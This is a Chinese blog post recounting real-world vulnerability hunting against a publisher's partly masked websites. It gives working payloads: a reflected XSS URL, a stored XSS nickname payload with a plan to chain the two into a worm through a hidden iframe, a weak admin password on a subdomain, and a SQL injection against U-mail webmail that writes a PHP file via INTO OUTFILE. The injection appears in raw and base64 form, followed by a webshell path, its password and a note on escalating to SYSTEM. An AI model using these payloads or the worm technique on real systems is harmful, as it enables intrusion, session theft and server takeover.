0
点赞
收藏
分享

微信扫一扫

实战挖掘某出版社漏洞集合

0x00 前言

之前挖漏洞时,碰到的一个出版社漏洞,也是挺有名的,看码猜社哈哈。


0x01 主站XSS

主页搜索框,发现是get传参

​​http://www.*****.com/so.htm?&KEY=1%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E​​

实战挖掘某出版社漏洞集合_网络安全


0x02 个人中心XSS可打Cookie

基本资料,昵称处限制了长度,直接插入payload

下面这张图截错了,修改了昵称后就没法修改了所以没有新图可截,直接在昵称插入payload保存即可

实战挖掘某出版社漏洞集合_漏洞挖掘_02

访问个人中心
昵称处已经空了

http://www.*****.com/blog/2342589/taokejian.htm

实战挖掘某出版社漏洞集合_网络安全_03

实战挖掘某出版社漏洞集合_网络安全_04
结合前台搜索框get型xss,iframe框架隐藏嵌入我的主页链接到搜索框中,传播即可造成xss蠕虫


0x03 分站XSS和弱口令

http://zy.*****.com/sp/getp****p.do

搜索框 弹一下 没啥卵用

实战挖掘某出版社漏洞集合_getshell_05

某资源平台,弱口令就进去了

http://x***ewm.*****.com/index        admin   123456

实战挖掘某出版社漏洞集合_php_06

实战挖掘某出版社漏洞集合_漏洞挖掘_07


0x04 邮件系统&getshell

U-mail​挺老的邮件系统了,很多洞,经过测试,通过注入​into outfile​拿到shell

http://mail.*****.com/

1. 信息泄露

http://mail.*****.com/webmail/customer/autoresp.php
路径泄露:D:\umail\WorldClient\html\userapply.php
info:http://mail.*****.com//webmail/info.php

2. 注入写马测试

aa’ union select 1,2,3,4,5,6,'phpinfo();?>’,8,9,10,11,12,13,14 into outfile 
‘D:/umail/WorldClient/html/src.php’#

上面语句base64转码

YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZWNobyBwaHBpbmZvKCk7Pz4nLDgsOSwxMCwxMSwxMiwxMywxNCBpbnRvIG91dGZpbGUgJ0Q6L3VtYWlsL1dvcmxkQ2xpZW50L2h0bWwvc3JjLnBocCcj==

访问:

http://mail.*****.com/webmail/fileshare.php?file=YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZWNobyBwaHBpbmZvKCk7Pz4nLDgsOSwxMCwxMSwxMiwxMywxNCBpbnRvIG91dGZpbGUgJ0Q6L3VtYWlsL1dvcmxkQ2xpZW50L2h0bWwvc3JjLnBocCcj==

实战挖掘某出版社漏洞集合_getshell_08实战挖掘某出版社漏洞集合_getshell_09

实战挖掘某出版社漏洞集合_漏洞挖掘_10实战挖掘某出版社漏洞集合_getshell_11

3. getshell

http://mail.*****.com/webmail/sss.php        密码g

win2008  network service 可秒system,就到这了没再继续了。

实战挖掘某出版社漏洞集合_getshell_12

举报

相关推荐

0 条评论